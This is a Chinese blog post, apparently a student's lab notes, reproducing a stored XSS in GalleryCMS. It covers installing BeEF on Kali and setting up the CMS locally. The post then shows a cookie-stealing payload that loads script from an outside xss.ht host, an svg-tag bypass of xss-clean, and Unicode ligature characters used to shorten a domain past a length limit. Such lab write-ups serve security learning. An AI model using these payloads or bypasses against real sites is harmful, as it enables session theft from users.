复现gallerycms字符长度限制短域名绕过

橙栎

已于 2022-07-26 16:41:42 修改

阅读量482

点赞数 1

分类专栏：安全笔记文章标签： mysql 数据库 php

于 2022-07-26 16:27:14 首次发布

本文链接：https://blog.csdn.net/lml_0916/article/details/125980768

版权

安全笔记专栏收录该内容

10 篇文章 0 订阅

订阅专栏

首先在开始写实验之前，在kali上线安装一下beef-xss。

1.在命令行中输入apt install beef-xss。
请添加图片描述

2.但是他可能会这样报错，所以我尝试了一下进行更新，也就是输入命令
apt-get update
apt-get upgrade

然而，我在输入的时候依旧是不对的，他的显示结果是这样的。
请添加图片描述
3.我就百度了一下最后一条“Unmet dependencies. Try ‘apt --fix-broken install’ with no packages (or specify a solution)”的解决办法，就是安装一下fix-broken。
apt --fix-broken install
但是我找的那篇文张还让在更新一遍，也就是第2个内容，然后我就照着做了，紧接着我就一直等他下载，等他下载，等了好久，然后我也忘记了我时候给它暂停还是真的等到它结束了，然后我觉得可能下完就可以了，就不用更新那一下。然后又重新在此敲了一遍安装命令，
4.安装成功后，直接运行就可以了
beef-xss
在运行中途他会让你修改密码，就随意设置一下就可以了，他是不会显示的。
然后就结束了
5.使用浏览器访问，在输入框中输入192.168.121.135:3000/ui/panel就可以了，然后会让你输入账号和密码，如果没有修改配置文件的话，默认账号就是beef，然后密码是你在第一次运行时让设置的密码。

搭建一下galleryCMS的服务器。

1.先将解压包解压到phpstudy_pro/WWW目录下面，然后找到文件application/config/database.php文件，在这里插入图片描述
然后修改文件中的数据库的用户名和密码为自己本机上的用户名和密码是一样的。

2.启动小皮，把服务器和数据库打开，然后新增一个网站，并且把刚才解压的GalleryCMS了路径放到根目录下面，然后域名设置为文件名。这些操作弄好之后，重启Apache服务和MySQL。
在这里插入图片描述
3.因为我是用kali中的浏览器打开的文档，所以先在本地服务中查看IP地址，
打开CMD，使用ipconfig命令来查看IP，得到的IP就在kali中的浏览器进行输入，可以进入到页面，但是这个页面是存在报错的。（因为一顿解决，忘记截图，所以就没有问题的图片了）
4.根据显示出来的错误可以看出是服务器的错误，所以打开MySQL，创建数据库gallaycms，使用表。然后再回到浏览器里面，可以看到的他是注册成功的，但是进入之后还是有错误的，所以这个数据库还是有问题的。也就是我们在插入字符段的长度是不够的，所以要修改字符长度。
在数据库中插入一条命令：alter table user modify last_ip varchar(100) not null default '127.0.0.1';
然后将报错中有一条命令（insert开头的，具体的我也没记住），将这个命令复制粘贴到MySQL的命令里面，然后再重新进入到kali的浏览器当中，在重新进一下，我们就可以进入了。
在这里插入图片描述

开始复现实验

首先在创建新相册名字的时候，我们先随意输出，
在这里插入图片描述
F12看到这里将他将刚刚输入的值传到了a标签里面

所以就看一下源文档，可以看出来他是直接输出URL的地址，并且看到了添加相册是后走的是add方法，并且过滤了两端的空格，还默认了必须填写，并且默认长度为45。并且使用了xss-clean

xss-clean:将一些符号过滤成为一些实体，并将一些关键字进行了过滤，

因为说到这个过滤了很多标签，所以我们先将xss-clean删掉，然后再创建名称出填写：< script >标签。
在这里插入图片描述
回到目录页面的时候他会出现弹窗，是因为他在创建的时候已经入库了，所以每一次进入的时候，他都是访问的。

这里就说明可以使用js代码。
所以我么为了获取到对方的cookie，我们来尝试使用>$.getScript(“//trlsm.xss.ht”)，
在这里插入图片描述
但是从图片可以看到我们使用最短的绕过方式，他也是字节太长，所以我们就是要修改这个的长度，

在源码当中我们规定的最长字符长度是：35
在这里插入图片描述虽然xss-clean过滤了很多标签，但是他还没有过滤掉< svg >标签，所以我们使用< svg>标签进行一个测试。

也就是可以找到一个svg的标签，来进行绕过。

但是这些个必备的命令已经有29个字符了，所以只能将域名缩短。
但是短域名的方式来实现，说以这里有一个知识点：

用短字符来绕过字符限制：这种的话比如说tel正常是3个字节，但是写成这样后℡，他会把他当成是一个字节来用。所以这样就尽可能的为我们节省了字符长度。

ﬀ expands to ff

℠ expands to sm
㏛ expands to sr
ﬆ expands to st
㎭ expands to rad
℡ expands to tel

然后我尝试了用老师的域名来弄，但是因为没有文件什么的，也不能修改外网ip为本机的，然后我有没有自己的域名，所以我只能尝试放宽字符限制长度使用ip进行测试。可以看见beef上出现了。
在这里插入图片描述

在这里插入图片描述

橙栎

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复现gallerycms字符长度限制短域名绕过

但是我找的那篇文张还让在更新一遍，也就是第2个内容，然后我就照着做了，紧接着我就一直等他下载，等他下载，等了好久，然后我也忘记了我时候给它暂停还是真的等到它结束了，然后我觉得可能下完就可以了，就不用更新那一下。然后将报错中有一条命令（insert开头的，具体的我也没记住），将这个命令复制粘贴到MySQL的命令里面，然后再重新进入到kali的浏览器当中，在重新进一下，我们就可以进入了。回到目录页面的时候他会出现弹窗，是因为他在创建的时候已经入库了，所以每一次进入的时候，他都是访问的。......
复制链接

扫一扫